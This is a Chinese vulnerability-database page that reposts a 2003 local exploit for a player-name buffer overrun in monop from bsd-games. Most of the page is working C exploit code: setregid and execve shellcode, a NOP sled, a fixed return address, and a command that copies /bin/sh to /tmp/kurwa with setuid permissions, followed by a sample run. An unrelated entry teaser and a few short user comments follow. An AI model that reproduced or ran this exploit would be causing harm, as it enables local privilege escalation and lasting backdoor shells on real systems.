BSD-Games 2.x – Monop Player Name Local Buffer Overrun (1)
漏洞ID | 1054119 | 漏洞类型 | |
发布时间 | 2003-08-25 | 更新时间 | 2003-08-25 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8501/info
Monop (included in bsd-games) is prone to a locally exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of player names. Monop is typically installed setgid games, so it is possible to exploit this issue to execute arbitrary code with these privileges.
/*
U-N-F http://www.u-n-f.com monosex - monop game local exploit - from bsd-games package - by ^sq
Second player's name buffer overflow.
Based on qobaiashi's u-n-f advisory.
Shouts: UNF, wsxz, qobaiashi, sxynx, DragonK, dtorsBob, LSD, s0t4ipv6
deltha@slack9:~$ ./monosex
MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOW
[+] Ret addy: 0x8050102
[+] Shellcode addy: 0xbffff2d0
uid=102(deltha) gid=20(games) groups=102(deltha)
ls:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB12: No such file or
directory
459881 -rwsrwxrwx 1 deltha games 628664 Aug 23 01:31 /tmp/kurwa
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFPIPE 512
#define CMD "rm -f /tmp/kurwa; id; cp /bin/sh /tmp/kurwa; chmod 4777 /tmp/kurwa; ls -ila /tmp/kurwa "
#define VULN "/usr/games/monop"
int main(int argc, char **argv)
{
FILE *pr;
char newline[2]="n";
pr = popen(VULN,"w");
char asd[BUFPIPE];
char firstplayer[93];
char buf[300+4];
char env[1024];
int ret = 0x8050102;
char shellcode[] =
/* setregid (20,20) shellcode */
"x31xc0x31xdbx31xc9xb3x14xb1x14xb0x47"
"xcdx80"
/*Lsd sh -c shellcode */
"xebx22" /* jmp <cmdshellcode+36> */
"x59" /* popl %ecx */
"x31xc0" /* xorl %eax,%eax */
"x50" /* pushl %eax */
"x68""//sh" /* pushl $0x68732f2f */
"x68""/bin" /* pushl $0x6e69622f */
"x89xe3" /* movl %esp,%ebx */
"x50" /* pushl %eax */
"x66x68""-c" /* pushw $0x632d */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x51" /* pushl %ecx */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x89xe1" /* movl %esp,%ecx */
"x99" /* cdql */
"xb0x0b" /* movb $0x0b,%al */
"xcdx80" /* int $0x80 */
"xe8xd9xffxffxff" /* call <cmdshellcode+2> */
;
printf("MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOWn");
printf("[+] Ret addy: 0x%xn", ret);
printf("[+] Shellcode addy: 0x%xn", shellcode);
//firstplayer increment to avoid heap addresses which contains zeros
memset(firstplayer, 0x42, 92);
memset(buf, 0x90, 300);
memcpy(&buf[300], (char *)&ret, 4);
memcpy(&buf[300 - strlen(shellcode) - strlen(CMD)],shellcode,strlen(shellcode));
memcpy(&buf[300 - strlen(CMD)],CMD,strlen(CMD));
if (!pr) abort();
// How many players? 2
strcpy(asd,"2");
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
// Player 1's name:
fputs(firstplayer,pr);
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
// Player 2's name: overflow
fputs(buf,pr);
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
pclose(pr);
return 0;
}
IRIX midikeys 根漏洞 漏洞ID 1105454 漏洞类型 访问验证错误 发布时间 1999-05-19 更新时间 1999-05-19 CVE编号 CVE-1999-0765 CNNVD-ID CNNVD-199905-039 漏洞平台 IRIX…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666